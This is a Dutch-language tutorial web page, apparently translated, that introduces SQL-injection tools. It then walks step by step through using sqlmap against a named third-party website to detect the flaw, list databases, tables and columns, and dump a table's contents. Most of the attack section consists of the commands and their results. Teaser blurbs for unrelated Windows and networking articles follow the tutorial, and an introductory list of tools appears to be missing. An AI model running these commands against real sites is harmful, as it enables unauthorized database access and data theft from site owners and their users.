In deze sectie zal LuckyTemplates enkele tools introduceren die worden gebruikt om SQL Injection te exploiteren .
Momenteel zijn er veel tools voor het scannen van beveiligingskwetsbaarheden (waaronder SQL-injectie). Deze tools maken het mogelijk om kwetsbaarheden in SQL-injectie behoorlijk sterk te detecteren en te exploiteren. Enkele veelgebruikte tools voor het exploiteren van kwetsbaarheden met automatische SQL-injectie zijn:
Er zijn ook enkele andere tools waarnaar u kunt verwijzen, zoals: Netsparker, jSQL Injection, Burp, BBQSQL...
Hieronder vindt u een demo van het gebruik van Sqlmap om eenvoudige SQL-injectie te exploiteren.
Sqlmap download je op http://sqlmap.org/
Sqlmap is geschreven in Python, dus om deze tool te gebruiken moet je Python installeren. Je kunt Python downloaden op http://www.python.org/downloads/
Eerst moet u de doelwebsite identificeren, hier heb ik het volgende doel: http://zerocoolhf.altervista.org/level1.php?id=1 (deze pagina is nu dood).
Stap 1 : Open cmd en typ de volgende opdracht:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap zal de kwetsbaarheid van het doel detecteren en informatie over de kwetsbaarheid verstrekken.
Stap 2 : Zodra we hebben vastgesteld dat de doelwebsite een kwetsbaarheid voor SQL-injectie heeft, gaan we verder met het vinden van de databasenaam.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Database: my_zerocoolhf
Stap 3 : Nadat we de databasenaam hebben bepaald, gaan we verder met het zoeken naar de namen van de tabellen in de database.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Er zijn 2 tabellen in de database: auth en book
Stap 4 : Bepaal de namen van de kolommen in de tabel
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Identificeer de kolommen in de boekentabel: auteur, id, prijs, titel.
Stap 5 : Gegevens uit de tabel dumpen.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> We hebben dus de database van de doelwebsite verkregen.
Hierboven ziet u een basisdemonstratie van het gebruik van sqlmap om SQL-injectiefouten te exploiteren. U kunt meer informatie over sqlmap-opties vinden op https://github.com/sqlmapproject/sqlmap/wiki/Usage om exploitatie te ondersteunen.
Ziet u een activeringsmelding voor Windows 10 in de rechterhoek van het scherm? In dit artikel wordt uitgelegd hoe u de kennisgeving van een auteursrechtverzoek op Windows 10 verwijdert.
Onlangs heeft Microsoft de nieuwste cumulatieve update voor Windows 10 pc-gebruikers uitgebracht, genaamd Build 14393.222. Deze update voor Windows 10 repareert voornamelijk bugs op basis van gebruikersfeedback en verbetert de prestatie-ervaring van het besturingssysteem.
Heeft u computers op uw lokale netwerk die externe toegang nodig hebben? Het gebruik van een bastionhost als poortwachter voor uw netwerk kan een goede oplossing zijn.
Soms moet u oude gebeurtenislogboeken in één keer verwijderen. In deze handleiding laat Quantrimang.com u 3 manieren zien om snel alle gebeurtenislogboeken in Windows 10 Event Viewer te verwijderen.
Als je liever een oud klassiek toetsenbord gebruikt, zoals het IBM Model M, dat geen fysieke Windows-sleutel bevat, kun je er eenvoudig meer toevoegen door een sleutel te lenen die je niet vaak gebruikt.
WindowTop is een tool waarmee u alle toepassingsvensters en programma's op computers met Windows 10 kunt dimmen. Of u kunt een donkere achtergrondinterface op Windows gebruiken.
In veel eerdere artikelen hebben we vermeld dat online anoniem blijven uiterst belangrijk is. Elk jaar lekt privé-informatie uit, waardoor online beveiliging steeds noodzakelijker wordt. Dat is ook de reden dat we virtuele IP-adressen moeten gebruiken. Hieronder zullen we leren over methoden om nep-IP's te maken!
De Taalbalk op Windows 8 is een miniatuurtaalwerkbalk die is ontworpen om automatisch op het bureaublad te worden weergegeven. Veel mensen willen deze taalbalk echter op de taakbalk verbergen.
Het maximaliseren van de internetsnelheid is essentieel voor het optimaliseren van uw netwerkverbinding. U kunt een optimale entertainment- en werkervaring hebben met behulp van computers, internet-tv's, gameconsoles, enz.
Draadloze connectiviteit is tegenwoordig een noodzaak en daarom is draadloze beveiliging essentieel om de veiligheid in uw interne netwerk te garanderen.
